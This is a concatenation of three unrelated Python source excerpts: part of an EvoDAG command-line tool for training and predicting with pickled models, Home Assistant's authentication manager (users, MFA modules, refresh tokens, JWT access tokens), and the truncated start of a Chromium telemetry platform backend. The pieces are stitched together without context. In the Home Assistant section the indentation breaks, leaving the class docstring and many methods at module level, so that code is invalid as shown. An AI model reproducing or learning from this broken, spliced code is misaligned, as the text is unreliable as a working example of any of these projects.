        else:
            with open(parameters, 'w') as fpt:
                fpt.write(res)
    def main(self):
        self.read_training_set()
        kw = {}
        if self.data.classifier:
            self.data.multiple_outputs = True
        elif self.data.output_dim > 1:
            self.data.multiple_outputs = True
        # Forward any EvoDAG parameter that was set on the command line.
        for k, v in EvoDAG().get_params().items():
            if hasattr(self.data, k) and getattr(self.data, k) is not None:
                kw[k] = getattr(self.data, k)
        self.evolve(kw)
class CommandLineTrain(CommandLine):
    """`EvoDAG-train`: fit a model (or ensemble) and pickle it to disk."""
    def __init__(self):
        self.Xtest = None
        self.inputs = Inputs()
        self.word2id = self.inputs.word2id
        self.label2id = self.inputs.label2id
        self.parser = argparse.ArgumentParser(description="EvoDAG")
        self.training_set()
        self.parameters()
        self.model()
        self.cores()
        self.ensemble()
        self.test_set()
        self.version()
    def parameters(self):
        """Add task-type / parameters-file / extra-kwargs flags."""
        cdn = 'File containing a list of parameters explored,\
        the first one being the best'
        g = self.parser.add_mutually_exclusive_group(required=True)
        g.add_argument('-C', '--classifier', dest='classifier',
                       help='The task is classification (default)',
                       default=True,
                       action="store_true")
        g.add_argument('-R', '--regressor', dest='regressor',
                       help='The task is regression',
                       action="store_true")
        g.add_argument('-P', '--parameters',
                       dest='parameters',
                       default=None,
                       type=str,
                       help=cdn)
        self.parser.add_argument('--output-dim',
                                 dest='output_dim',
                                 default=1,
                                 type=int,
                                 help="Output Dimension (default 1) use with multiple-outputs flag")
        dr = self.parser.add_argument
        dr('--kw', dest='kwargs', default=None, type=str,
           help='Parameters in json that overwrite default parameters')
    def model(self):
        """Add model-output / json / seed flags."""
        cdn = 'File to store EvoDAG model'
        pa = self.parser.add_argument
        pa('-m', '--model',
           dest='model_file',
           type=str,
           help=cdn)
        pa('-j', '--json', dest='json',
           action="store_true",
           help='Whether the inputs are in json format',
           default=False)
        # pa('--min-size', dest='min_size',
        #    type=int, default=1, help='Model min-size')
        pa('-s', '--seed', dest='seed',
           default=-1, type=int, help='Seed')
    def main(self):
        self.read_training_set()
        self.read_test_set()
        model_file = self.get_model_file()
        classifier = False if self.data.regressor else True
        kw = dict(params_fname=self.data.parameters, classifier=classifier)
        # seed < 0 (the default) means "let the library pick".
        if self.data.seed >= 0:
            kw['seed'] = self.data.seed
        if self.data.kwargs is not None:
            _ = json.loads(self.data.kwargs)
            kw.update(_)
        if self.data.ensemble_size == 1:
            evo = model_EvoDAG(**kw).fit(self.X, self.y, test_set=self.Xtest)
            # NOTE(review): `evo.model` is not called here while the ensemble
            # branch stores the fitted object directly — confirm `.model` is a
            # property (not a bound method) on model_EvoDAG.
            self.model = evo.model
        else:
            self.model = EvoDAGE(n_estimators=self.data.ensemble_size,
                                 n_jobs=self.data.cpu_cores,
                                 tmpdir=model_file + '_dir',
                                 **kw).fit(self.X, self.y,
                                           test_set=self.Xtest)
        # Persist model plus the vocab/label mappings in one gzip stream.
        with gzip.open(model_file, 'w') as fpt:
            pickle.dump(self.model, fpt)
            pickle.dump(self.word2id, fpt)
            pickle.dump(self.label2id, fpt)
class CommandLinePredict(CommandLine):
    """`EvoDAG-predict`: load a pickled model and predict on a test set."""
    def __init__(self):
        self.Xtest = None
        self.inputs = Inputs()
        self.word2id = self.inputs.word2id
        self.label2id = self.inputs.label2id
        self.parser = argparse.ArgumentParser(description="EvoDAG")
        self.model()
        self.test_set()
        self.output_file()
        self.raw_outputs()
        self.cores()
        self.version()
    def test_set(self):
        """Positional test-set argument (required, unlike the base class)."""
        cdn = 'File containing the test set on csv.'
        self.parser.add_argument('test_set',
                                 default=None,
                                 help=cdn)
    def raw_outputs(self):
        """Add the --raw-outputs flag."""
        cdn = 'Raw decision function.'
        self.parser.add_argument('--raw-outputs',
                                 default=False,
                                 dest='raw_outputs',
                                 action='store_true',
                                 help=cdn)
    def model(self):
        """Add model-file / json / output-mode flags."""
        cdn = 'EvoDAG model'
        pa = self.parser.add_argument
        pa('-m', '--model',
           dest='model_file',
           type=str,
           help=cdn)
        pa('-j', '--json', dest='json',
           action="store_true",
           help='Whether the inputs are in json format',
           default=False)
        pa('--decision-function', dest='decision_function', default=False,
           action='store_true',
           help='Outputs the decision functions instead of the class')
        pa('--predict-proba', dest='predict_proba', default=False,
           action='store_true',
           help='Outputs the probability instead of the class')
    def main(self):
        model_file = self.get_model_file()
        # The model stream also carries the vocab/label maps written by train.
        with gzip.open(model_file, 'r') as fpt:
            m = pickle.load(fpt)
            self.inputs.word2id.update(pickle.load(fpt))
            self.inputs.label2id.update(pickle.load(fpt))
        self.read_test_set()
        self.data.classifier = m.classifier
        # Output modes, most specific first: raw, probabilities, decision
        # function, otherwise class labels.
        if self.data.raw_outputs:
            m._n_jobs = self.data.cpu_cores
            hy = m.raw_decision_function(self.Xtest)
            if hy.ndim == 3:
                # Flatten (k, n, c) into a 2-D table of rows.
                hy.shape = (hy.shape[1] * hy.shape[0], hy.shape[-1])
            hy = "\n".join([",".join([str(i) for i in x]) for x in hy])
        elif self.data.predict_proba:
            m._n_jobs = self.data.cpu_cores
            hy = m.predict_proba(self.Xtest)
            hy = "\n".join([",".join([str(i) for i in x]) for x in hy])
        elif self.data.decision_function:
            hy = m.decision_function(self.Xtest, cpu_cores=self.data.cpu_cores)
            hy = "\n".join([",".join([str(i) for i in x]) for x in hy])
        else:
            hy = self.id2label(m.predict(self.Xtest, cpu_cores=self.data.cpu_cores))
            hy = "\n".join(map(str, hy))
        with open(self.get_output_file(), 'w') as fpt:
            fpt.write(hy)
class CommandLineUtils(CommandLine):
    """`EvoDAG-utils`: inspection and maintenance helpers for stored models."""
    def __init__(self):
        self.Xtest = None
        self.inputs = Inputs()
        self.word2id = self.inputs.word2id
        self.label2id = self.inputs.label2id
        self.parser = argparse.ArgumentParser(description="EvoDAG")
        self.model()
        self.graphviz()
        self.params_stats()
        self.output_file()
        self.fitness()
        self.size()
        self.height()
        self.remove_terminals()
        self.used_inputs_number()
        self.create_ensemble_params()
        self.cores()
        self.version()
    def create_ensemble_params(self):
        """Add ensemble-creation / best-params-search flags."""
        self.parser.add_argument('--create-ensemble',
                                 help='Models to ensemble', dest='ensemble',
                                 default=False, action='store_true')
        self.parser.add_argument('--best-params-file',
                                 help='Search for the best configuration in a given directory', dest='best_params_file', default=False, action='store_true')
        self.parser.add_argument('-n', '--ensemble-size',
                                 help='Ensemble size (default: select all models)',
                                 dest='ensemble_size',
                                 default=-1,
                                 type=int)
    def used_inputs_number(self):
        """Add the --used-inputs-number flag."""
        self.parser.add_argument('--used-inputs-number',
                                 help='Number of inputs used',
                                 dest='used_inputs_number',
                                 default=False, action='store_true')
    def remove_terminals(self):
        """Add the --remove-terminals flag (graphviz output option)."""
        self.parser.add_argument('--remove-terminals',
                                 help='Do not display terminals',
                                 dest='remove_terminals',
                                 default=False, action='store_true')
    def height(self):
        """Add the --height flag."""
        self.parser.add_argument('--height',
                                 help='Model height',
                                 dest='height',
                                 default=False, action='store_true')
    def size(self):
        """Add the --size flag."""
        self.parser.add_argument('--size',
                                 help='Model size',
                                 dest='size',
                                 default=False, action='store_true')
    def fitness(self):
        """Add the --fitness flag."""
        self.parser.add_argument('--fitness',
                                 help='Fitness in the validation set',
                                 dest='fitness',
                                 default=False, action='store_true')
    def graphviz(self):
        """Add the -G/--graphviz flag."""
        self.parser.add_argument('-G', '--graphviz',
                                 help='Plot the model using dot language',
                                 dest='graphviz',
                                 default=False, action='store_true')
    def params_stats(self):
        """Add the -P/--params-stats flag."""
        self.parser.add_argument('-P', '--params-stats',
                                 help='Parameters statistics',
                                 dest='params_stats',
                                 default=False, action='store_true')
    def output_file(self):
        """Add -o/--output-file (overrides the base-class help text)."""
        self.parser.add_argument('-o', '--output-file',
                                 help='File / directory to store the result(s)',
                                 dest='output_file',
                                 default=None,
                                 type=str)
    def model(self):
        """Positional model/params file argument."""
        cdn = 'File containing the model/params.'
        self.parser.add_argument('model_file',
                                 default=None,
                                 type=str,
                                 help=cdn)
    def read_params(self, parameters):
        """Load a JSON parameters file, transparently handling .gz."""
        if parameters.endswith('.gz'):
            with gzip.open(parameters, 'rb') as fpt:
                # py2/py3 compatibility when decoding the gzip payload.
                try:
                    res = fpt.read()
                    return json.loads(str(res, encoding='utf-8'))
                except TypeError:
                    return json.loads(res)
        else:
            with open(parameters, 'r') as fpt:
                return json.loads(fpt.read())
    def create_ensemble(self, model_file):
        """Combine pickled models (space-separated globs) into one Ensemble."""
        from glob import glob
        models = []
        flag = False
        for fname in model_file.split(' '):
            for k in tqdm(glob(fname)):
                try:
                    with gzip.open(k, 'r') as fpt:
                        models.append(pickle.load(fpt))
                        self.inputs.word2id.update(pickle.load(fpt))
                        self.inputs.label2id.update(pickle.load(fpt))
                except EOFError:
                    # Truncated model file: remove it and abort below.
                    flag = True
                    os.unlink(k)
        if flag:
            raise RuntimeError('Unable to read models')
        models.sort(key=lambda x: x.fitness_vs, reverse=True)
        # ensemble_size < 0 means "keep every model".
        if self.data.ensemble_size > 0:
            models = models[:self.data.ensemble_size]
        self.model = Ensemble(models)
        model_file = self.data.output_file
        with gzip.open(model_file, 'w') as fpt:
            pickle.dump(self.model, fpt)
            pickle.dump(self.word2id, fpt)
            pickle.dump(self.label2id, fpt)
    def get_best_params(self, model_file):
        """Pick the configuration with best median fitness among *.model files."""
        from glob import glob
        h = {}
        args = glob('%s/*.model' % model_file)
        if self.data.cpu_cores == 1:
            res = [get_model_fitness(x) for x in tqdm(args)]
        else:
            p = Pool(self.data.cpu_cores)
            res = [x for x in tqdm(p.imap_unordered(get_model_fitness, args),
                                   total=len(args))]
            p.close()
        # Group fitness values by the configuration prefix of the file name.
        for m, fit in res:
            basename = (m.split(os.path.join(model_file, ''))[1]).split('_')[:1]
            fname = "_".join(basename)
            try:
                h[fname].append(fit)
            except KeyError:
                h[fname] = [fit]
        b = max(h.items(), key=lambda x: np.median(x[1]))
        self.best_params = b[0] + '_params.json'
    def main(self):
        def most_common(K, a):
            """Summarize a Counter: mode for categorical, weighted mean for numeric."""
            # py2 compatibility: unicode does not exist on py3.
            try:
                str_type = unicode
            except NameError:
                str_type = str
            l = a.most_common()
            if len(l):
                if len(PARAMS[K]) <= 2:
                    return l[0]
                elif isinstance(l[0][0], str_type):
                    return l[0]
                else:
                    num = np.sum([x * y for x, y in a.items()])
                    den = float(np.sum([y for y in a.values()]))
                    return num / den
            return ""
        # Exactly one action flag is expected; they are checked in order.
        model_file = self.get_model_file()
        if self.data.graphviz:
            with gzip.open(model_file, 'r') as fpt:
                m = pickle.load(fpt)
                self.inputs.word2id.update(pickle.load(fpt))
                self.inputs.label2id.update(pickle.load(fpt))
            remove_terminals = self.data.remove_terminals
            if remove_terminals:
                m.graphviz(self.data.output_file, terminals=False)
            else:
                m.graphviz(self.data.output_file)
        elif self.data.params_stats:
            params = {k: collections.Counter() for k in PARAMS.keys()}
            stats = self.read_params(model_file)
            for l in stats:
                for k, v in l.items():
                    if k not in params:
                        continue
                    params[k][v] += 1
            with open(self.data.output_file, 'w') as fpt:
                fpt.write(json.dumps({k: most_common(k, v) for k, v
                                      in params.items()}, sort_keys=True, indent=2))
        elif self.data.fitness:
            with gzip.open(model_file, 'r') as fpt:
                m = pickle.load(fpt)
                self.inputs.word2id.update(pickle.load(fpt))
                self.inputs.label2id.update(pickle.load(fpt))
            # Fitness is stored negated; flip the sign for display.
            print("Median fitness: %0.4f" % (m.fitness_vs * -1))
        elif self.data.size:
            with gzip.open(model_file, 'r') as fpt:
                m = pickle.load(fpt)
                self.inputs.word2id.update(pickle.load(fpt))
                self.inputs.label2id.update(pickle.load(fpt))
            print("Size: %s" % m.size)
        elif self.data.height:
            with gzip.open(model_file, 'r') as fpt:
                m = pickle.load(fpt)
                self.inputs.word2id.update(pickle.load(fpt))
                self.inputs.label2id.update(pickle.load(fpt))
            print("Height: %s" % m.height)
        elif self.data.used_inputs_number:
            with gzip.open(model_file, 'r') as fpt:
                m = pickle.load(fpt)
                self.word2id = pickle.load(fpt)
                self.label2id = pickle.load(fpt)
            inputs = m.inputs()
            print("Used inputs number", len(inputs))
        elif self.data.ensemble:
            self.create_ensemble(model_file)
        elif self.data.best_params_file:
            self.get_best_params(model_file)
            print(self.best_params)
def params(output=False):
    """EvoDAG-params command line entry point.

    Returns the command object when *output* is True (useful for testing).
    """
    cmd = CommandLineParams()
    cmd.parse_args()
    return cmd if output else None
def train(output=False):
    """EvoDAG-train command line entry point.

    Fixes the copy-pasted "EvoDAG-params" docstring.  Returns the command
    object when *output* is True (useful for testing).
    """
    c = CommandLineTrain()
    c.parse_args()
    if output:
        return c
def predict(output=False):
    """EvoDAG-predict command line entry point.

    Fixes the copy-pasted "EvoDAG-params" docstring and adds the same
    optional *output* parameter as the sibling entry points (backward
    compatible: default keeps the old no-return behavior).
    """
    c = CommandLinePredict()
    c.parse_args()
    if output:
        return c
def utils(output=False):
    """EvoDAG-utils command line entry point.

    Returns the command object when *output* is True (useful for testing).
    """
    cmd = CommandLineUtils()
    cmd.parse_args()
    return cmd if output else None
| |
"""Provide an authentication layer for Home Assistant."""
from __future__ import annotations
import asyncio
from collections import OrderedDict
from datetime import timedelta
from typing import Any, Dict, Mapping, Optional, Tuple, cast
import jwt
from homeassistant import data_entry_flow
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.util import dt as dt_util
from . import auth_store, models
from .const import ACCESS_TOKEN_EXPIRATION, GROUP_ID_ADMIN
from .mfa_modules import MultiFactorAuthModule, auth_mfa_module_from_config
from .providers import AuthProvider, LoginFlow, auth_provider_from_config
# Event types fired on the Home Assistant bus when the user set changes.
EVENT_USER_ADDED = "user_added"
EVENT_USER_REMOVED = "user_removed"
# Typing aliases for the provider/module registries; providers are keyed
# by (provider type, optional provider id).
_MfaModuleDict = Dict[str, MultiFactorAuthModule]
_ProviderKey = Tuple[str, Optional[str]]
_ProviderDict = Dict[_ProviderKey, AuthProvider]
class InvalidAuthError(Exception):
    """Raised when an authentication error occurs."""
class InvalidProvider(Exception):
    """Raised when the requested authentication provider is not found."""
async def auth_manager_from_config(
    hass: HomeAssistant,
    provider_configs: list[dict[str, Any]],
    module_configs: list[dict[str, Any]],
) -> AuthManager:
    """Initialize an auth manager from config.

    CORE_CONFIG_SCHEMA guarantees that no duplicated auth providers or
    mfa modules exist in the configs.
    """
    store = auth_store.AuthStore(hass)
    providers = (
        await asyncio.gather(
            *(
                auth_provider_from_config(hass, store, conf)
                for conf in provider_configs
            )
        )
        if provider_configs
        else []
    )
    # Keep the auth providers in the same order as the config.
    provider_hash: _ProviderDict = OrderedDict(
        ((provider.type, provider.id), provider) for provider in providers
    )
    modules = (
        await asyncio.gather(
            *(auth_mfa_module_from_config(hass, conf) for conf in module_configs)
        )
        if module_configs
        else []
    )
    # Keep the auth modules in the same order as the config.
    module_hash: _MfaModuleDict = OrderedDict(
        (module.id, module) for module in modules
    )
    return AuthManager(hass, store, provider_hash, module_hash)
class AuthManagerFlowManager(data_entry_flow.FlowManager):
    """Manage authentication flows."""
    def __init__(self, hass: HomeAssistant, auth_manager: AuthManager) -> None:
        """Init auth manager flows."""
        super().__init__(hass)
        self.auth_manager = auth_manager
    async def async_create_flow(
        self,
        handler_key: Any,
        *,
        context: dict[str, Any] | None = None,
        data: dict[str, Any] | None = None,
    ) -> data_entry_flow.FlowHandler:
        """Create a login flow.

        *handler_key* is the (provider type, provider id) pair used to look
        up the auth provider.
        """
        auth_provider = self.auth_manager.get_auth_provider(*handler_key)
        if not auth_provider:
            raise KeyError(f"Unknown auth provider {handler_key}")
        return await auth_provider.async_login_flow(context)
    async def async_finish_flow(
        self, flow: data_entry_flow.FlowHandler, result: FlowResult
    ) -> FlowResult:
        """Return a user as result of login flow.

        Converts the flow's data into credentials and, when applicable,
        redirects into an MFA step before completing.
        """
        flow = cast(LoginFlow, flow)
        if result["type"] != data_entry_flow.RESULT_TYPE_CREATE_ENTRY:
            return result
        # We got the final result.
        if isinstance(result["data"], models.Credentials):
            result["result"] = result["data"]
            return result
        auth_provider = self.auth_manager.get_auth_provider(*result["handler"])
        if not auth_provider:
            raise KeyError(f"Unknown auth provider {result['handler']}")
        credentials = await auth_provider.async_get_or_create_credentials(
            cast(Mapping[str, str], result["data"]),
        )
        if flow.context.get("credential_only"):
            result["result"] = credentials
            return result
        # A multi-factor module cannot be enabled for a new credential
        # that has not been linked to a user yet.
        if auth_provider.support_mfa and not credentials.is_new:
            user = await self.auth_manager.async_get_user_by_credentials(credentials)
            if user is not None:
                modules = await self.auth_manager.async_get_enabled_mfa(user)
                if modules:
                    flow.credential = credentials
                    flow.user = user
                    flow.available_mfa_modules = modules
                    return await flow.async_step_select_mfa_module()
        result["result"] = credentials
        return result
class AuthManager:
"""Manage the authentication for Home Assistant."""
    def __init__(
        self,
        hass: HomeAssistant,
        store: auth_store.AuthStore,
        providers: _ProviderDict,
        mfa_modules: _MfaModuleDict,
    ) -> None:
        """Initialize the auth manager."""
        self.hass = hass
        self._store = store
        self._providers = providers
        self._mfa_modules = mfa_modules
        self.login_flow = AuthManagerFlowManager(hass, self)
        # NOTE(review): callbacks invoked on token revocation, presumably
        # keyed by refresh token id — confirm against the registration site
        # (not visible here).
        self._revoke_callbacks: dict[str, list[CALLBACK_TYPE]] = {}
@property
def auth_providers(self) -> list[AuthProvider]:
"""Return a list of available auth providers."""
return list(self._providers.values())
@property
def auth_mfa_modules(self) -> list[MultiFactorAuthModule]:
"""Return a list of available auth modules."""
return list(self._mfa_modules.values())
def get_auth_provider(
self, provider_type: str, provider_id: str | None
) -> AuthProvider | None:
"""Return an auth provider, None if not found."""
return self._providers.get((provider_type, provider_id))
def get_auth_providers(self, provider_type: str) -> list[AuthProvider]:
"""Return a List of auth provider of one type, Empty if not found."""
return [
provider
for (p_type, _), provider in self._providers.items()
if p_type == provider_type
]
def get_auth_mfa_module(self, module_id: str) -> MultiFactorAuthModule | None:
"""Return a multi-factor auth module, None if not found."""
return self._mfa_modules.get(module_id)
async def async_get_users(self) -> list[models.User]:
"""Retrieve all users."""
return await self._store.async_get_users()
async def async_get_user(self, user_id: str) -> models.User | None:
"""Retrieve a user."""
return await self._store.async_get_user(user_id)
async def async_get_owner(self) -> models.User | None:
"""Retrieve the owner."""
users = await self.async_get_users()
return next((user for user in users if user.is_owner), None)
async def async_get_group(self, group_id: str) -> models.Group | None:
"""Retrieve all groups."""
return await self._store.async_get_group(group_id)
async def async_get_user_by_credentials(
self, credentials: models.Credentials
) -> models.User | None:
"""Get a user by credential, return None if not found."""
for user in await self.async_get_users():
for creds in user.credentials:
if creds.id == credentials.id:
return user
return None
async def async_create_system_user(
self, name: str, group_ids: list[str] | None = None
) -> models.User:
"""Create a system user."""
user = await self._store.async_create_user(
name=name, system_generated=True, is_active=True, group_ids=group_ids or []
)
self.hass.bus.async_fire(EVENT_USER_ADDED, {"user_id": user.id})
return user
async def async_create_user(
    self, name: str, group_ids: list[str] | None = None
) -> models.User:
    """Create a regular user; the first non-system user becomes owner."""
    params: dict[str, Any] = {
        "name": name,
        "is_active": True,
        "group_ids": group_ids or [],
    }
    if await self._user_should_be_owner():
        params["is_owner"] = True

    new_user = await self._store.async_create_user(**params)
    self.hass.bus.async_fire(EVENT_USER_ADDED, {"user_id": new_user.id})
    return new_user
async def async_get_or_create_user(
    self, credentials: models.Credentials
) -> models.User:
    """Get or create a user.

    Existing (not-new) credentials must already resolve to a user; for
    brand-new credentials a user is created using metadata supplied by
    the auth provider that owns the credential.
    """
    if not credentials.is_new:
        # Credential was stored before, so it must be linked to a user.
        user = await self.async_get_user_by_credentials(credentials)
        if user is None:
            raise ValueError("Unable to find the user.")
        return user
    auth_provider = self._async_get_auth_provider(credentials)
    if auth_provider is None:
        raise RuntimeError("Credential with unknown provider encountered")
    # Ask the provider for display name / active flag for this credential.
    info = await auth_provider.async_user_meta_for_credentials(credentials)
    user = await self._store.async_create_user(
        credentials=credentials,
        name=info.name,
        is_active=info.is_active,
        group_ids=[GROUP_ID_ADMIN],
    )
    self.hass.bus.async_fire(EVENT_USER_ADDED, {"user_id": user.id})
    return user
async def async_link_user(
    self, user: models.User, credentials: models.Credentials
) -> None:
    """Attach credentials to user; no-op when already linked to them."""
    current_owner = await self.async_get_user_by_credentials(credentials)
    if current_owner == user:
        # Already linked to this very user; nothing to do.
        return
    if current_owner is not None:
        raise ValueError("Credential is already linked to a user")
    await self._store.async_link_user(user, credentials)
async def async_remove_user(self, user: models.User) -> None:
    """Delete a user and its credentials, then fire a removal event."""
    removals = [
        self.async_remove_credentials(credentials)
        for credentials in user.credentials
    ]
    if removals:
        await asyncio.gather(*removals)

    await self._store.async_remove_user(user)
    self.hass.bus.async_fire(EVENT_USER_REMOVED, {"user_id": user.id})
async def async_update_user(
    self,
    user: models.User,
    name: str | None = None,
    is_active: bool | None = None,
    group_ids: list[str] | None = None,
) -> None:
    """Update name/groups via the store; toggle activation separately."""
    changes: dict[str, Any] = {}
    if name is not None:
        changes["name"] = name
    if group_ids is not None:
        changes["group_ids"] = group_ids
    await self._store.async_update_user(user, **changes)

    if is_active is None:
        return
    if is_active is True:
        await self.async_activate_user(user)
    else:
        await self.async_deactivate_user(user)
async def async_activate_user(self, user: models.User) -> None:
    """Mark a user as active in the store."""
    await self._store.async_activate_user(user)
async def async_deactivate_user(self, user: models.User) -> None:
    """Mark a user inactive; the owner can never be deactivated."""
    if user.is_owner:
        raise ValueError("Unable to deactivate the owner")
    await self._store.async_deactivate_user(user)
async def async_remove_credentials(self, credentials: models.Credentials) -> None:
    """Remove credentials.

    Gives the owning auth provider a chance to clean up first via its
    optional async_will_remove_credentials hook.
    """
    provider = self._async_get_auth_provider(credentials)

    if provider is not None and hasattr(provider, "async_will_remove_credentials"):
        # hasattr check because the hook is optional on providers.
        # https://github.com/python/mypy/issues/1424
        await provider.async_will_remove_credentials(credentials)  # type: ignore

    await self._store.async_remove_credentials(credentials)
async def async_enable_user_mfa(
    self, user: models.User, mfa_module_id: str, data: Any
) -> None:
    """Set up a multi-factor auth module for a non-system user."""
    if user.system_generated:
        raise ValueError(
            "System generated users cannot enable multi-factor auth module."
        )

    module = self.get_auth_mfa_module(mfa_module_id)
    if module is None:
        raise ValueError(f"Unable find multi-factor auth module: {mfa_module_id}")

    await module.async_setup_user(user.id, data)
async def async_disable_user_mfa(
    self, user: models.User, mfa_module_id: str
) -> None:
    """Tear down a multi-factor auth module for a non-system user."""
    if user.system_generated:
        raise ValueError(
            "System generated users cannot disable multi-factor auth module."
        )

    module = self.get_auth_mfa_module(mfa_module_id)
    if module is None:
        raise ValueError(f"Unable find multi-factor auth module: {mfa_module_id}")

    await module.async_depose_user(user.id)
async def async_get_enabled_mfa(self, user: models.User) -> dict[str, str]:
    """Map module_id -> module name for modules the user has set up."""
    enabled: dict[str, str] = OrderedDict()
    for module_id, module in self._mfa_modules.items():
        if not await module.async_is_user_setup(user.id):
            continue
        enabled[module_id] = module.name
    return enabled
async def async_create_refresh_token(
    self,
    user: models.User,
    client_id: str | None = None,
    client_name: str | None = None,
    client_icon: str | None = None,
    token_type: str | None = None,
    access_token_expiration: timedelta = ACCESS_TOKEN_EXPIRATION,
    credential: models.Credentials | None = None,
) -> models.RefreshToken:
    """Create a new refresh token for a user.

    Raises ValueError when the combination of user kind, token type and
    client information is invalid:
    - inactive users get no tokens;
    - system users may not be tied to a client and only get system tokens;
    - normal tokens require a client_id;
    - long-lived tokens require a client_name, and only one long-lived
      token may exist per client_name.
    """
    if not user.is_active:
        raise ValueError("User is not active")

    if user.system_generated and client_id is not None:
        raise ValueError(
            "System generated users cannot have refresh tokens connected "
            "to a client."
        )

    # Default the token type from the kind of user.
    if token_type is None:
        if user.system_generated:
            token_type = models.TOKEN_TYPE_SYSTEM
        else:
            token_type = models.TOKEN_TYPE_NORMAL

    if user.system_generated != (token_type == models.TOKEN_TYPE_SYSTEM):
        raise ValueError(
            "System generated users can only have system type refresh tokens"
        )

    if token_type == models.TOKEN_TYPE_NORMAL and client_id is None:
        raise ValueError("Client is required to generate a refresh token.")

    if (
        token_type == models.TOKEN_TYPE_LONG_LIVED_ACCESS_TOKEN
        and client_name is None
    ):
        raise ValueError("Client_name is required for long-lived access token")

    if token_type == models.TOKEN_TYPE_LONG_LIVED_ACCESS_TOKEN:
        for token in user.refresh_tokens.values():
            if (
                token.client_name == client_name
                and token.token_type == models.TOKEN_TYPE_LONG_LIVED_ACCESS_TOKEN
            ):
                # Each client_name can only have one
                # long_lived_access_token type of refresh token
                raise ValueError(f"{client_name} already exists")

    return await self._store.async_create_refresh_token(
        user,
        client_id,
        client_name,
        client_icon,
        token_type,
        access_token_expiration,
        credential,
    )
async def async_get_refresh_token(
    self, token_id: str
) -> models.RefreshToken | None:
    """Look up a refresh token by its id, or None."""
    token = await self._store.async_get_refresh_token(token_id)
    return token
async def async_get_refresh_token_by_token(
    self, token: str
) -> models.RefreshToken | None:
    """Look up a refresh token by its token string, or None."""
    found = await self._store.async_get_refresh_token_by_token(token)
    return found
async def async_remove_refresh_token(
    self, refresh_token: models.RefreshToken
) -> None:
    """Delete a refresh token and run any registered revoke callbacks."""
    await self._store.async_remove_refresh_token(refresh_token)

    for revoke_callback in self._revoke_callbacks.pop(refresh_token.id, []):
        revoke_callback()
@callback
def async_register_revoke_token_callback(
    self, refresh_token_id: str, revoke_callback: CALLBACK_TYPE
) -> CALLBACK_TYPE:
    """Register a callback invoked when the refresh token id is revoked.

    Returns a function that unregisters the callback again.
    """
    callbacks = self._revoke_callbacks.setdefault(refresh_token_id, [])
    callbacks.append(revoke_callback)

    @callback
    def unregister() -> None:
        """Remove the callback if it is still registered."""
        if revoke_callback in callbacks:
            callbacks.remove(revoke_callback)

    return unregister
@callback
def async_create_access_token(
    self, refresh_token: models.RefreshToken, remote_ip: str | None = None
) -> str:
    """Create a new JWT access token backed by a refresh token.

    Validates the refresh token first and logs the usage together with
    the caller's IP.
    """
    self.async_validate_refresh_token(refresh_token, remote_ip)

    self._store.async_log_refresh_token_usage(refresh_token, remote_ip)

    now = dt_util.utcnow()
    # Signed with the per-refresh-token key, so revoking the refresh
    # token invalidates every access token derived from it.
    return jwt.encode(
        {
            "iss": refresh_token.id,
            "iat": now,
            "exp": now + refresh_token.access_token_expiration,
        },
        refresh_token.jwt_key,
        algorithm="HS256",
    )
@callback
def _async_resolve_provider(
    self, refresh_token: models.RefreshToken
) -> AuthProvider | None:
    """Resolve the auth provider that issued a refresh token.

    Returns None when no provider was expected for this refresh token;
    raises InvalidProvider when the expected provider is no longer
    available.
    """
    credential = refresh_token.credential
    if credential is None:
        return None

    provider = self.get_auth_provider(
        credential.auth_provider_type,
        credential.auth_provider_id,
    )
    if provider is not None:
        return provider

    raise InvalidProvider(
        f"Auth provider {refresh_token.credential.auth_provider_type}, {refresh_token.credential.auth_provider_id} not available"
    )
@callback
def async_validate_refresh_token(
    self, refresh_token: models.RefreshToken, remote_ip: str | None = None
) -> None:
    """Validate that a refresh token is usable.

    Will raise InvalidAuthError on errors.
    """
    provider = self._async_resolve_provider(refresh_token)
    if provider:
        provider.async_validate_refresh_token(refresh_token, remote_ip)
async def async_validate_access_token(
    self, token: str
) -> models.RefreshToken | None:
    """Return the refresh token behind a valid access token, else None."""
    try:
        # Decode without verification first, only to learn which refresh
        # token ("iss" claim) the access token claims to come from.
        unverif_claims = jwt.decode(
            token, algorithms=["HS256"], options={"verify_signature": False}
        )
    except jwt.InvalidTokenError:
        return None

    refresh_token = await self.async_get_refresh_token(
        cast(str, unverif_claims.get("iss"))
    )

    if refresh_token is None:
        # Still perform the full decode below with a dummy key/issuer so
        # the work done is similar whether or not the token is known.
        jwt_key = ""
        issuer = ""
    else:
        jwt_key = refresh_token.jwt_key
        issuer = refresh_token.id

    try:
        # leeway tolerates small clock skew when checking expiry.
        jwt.decode(token, jwt_key, leeway=10, issuer=issuer, algorithms=["HS256"])
    except jwt.InvalidTokenError:
        return None

    if refresh_token is None or not refresh_token.user.is_active:
        return None

    return refresh_token
@callback
def _async_get_auth_provider(
    self, credentials: models.Credentials
) -> AuthProvider | None:
    """Return the provider that owns these credentials, if configured."""
    return self._providers.get(
        (credentials.auth_provider_type, credentials.auth_provider_id)
    )
async def _user_should_be_owner(self) -> bool:
"""Determine if user should be owner.
A user should be an owner if it is the first non-system user that is
being created.
"""
for user in await self._store.async_get_users():
if not user.system_generated:
return False
return True
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import weakref
from telemetry.internal.forwarders import do_nothing_forwarder
from telemetry.internal.platform import network_controller_backend
from telemetry.internal.platform import tracing_controller_backend
# pylint: disable=W0613
class PlatformBackend(object):
  """Base class for platform-specific telemetry operations.

  Capability probes (Can*/Is*Supported) default to False and operations
  without a portable default raise NotImplementedError; platform
  subclasses override what they actually support.
  """

  def __init__(self, device=None):
    """Initialize an instance of PlatformBackend from a device, optionally.

    Call sites need to use SupportsDevice before initialization to check
    whether this platform backend supports the device.

    If device is None, this constructor returns the host platform backend
    which telemetry is running on.

    Args:
      device: an instance of telemetry.core.platform.device.Device.
    """
    if device and not self.SupportsDevice(device):
      raise ValueError('Unsupported device: %s' % device.name)
    self._platform = None
    # WeakSet so browser backends released elsewhere don't linger here.
    self._running_browser_backends = weakref.WeakSet()
    self._network_controller_backend = None
    self._tracing_controller_backend = None
    self._forwarder_factory = None

  def InitPlatformBackend(self):
    # Deferred construction: these controller backends need a fully
    # constructed self.
    self._network_controller_backend = (
        network_controller_backend.NetworkControllerBackend(self))
    self._tracing_controller_backend = (
        tracing_controller_backend.TracingControllerBackend(self))

  @classmethod
  def IsPlatformBackendForHost(cls):
    """Returns whether this platform backend is the platform backend to be
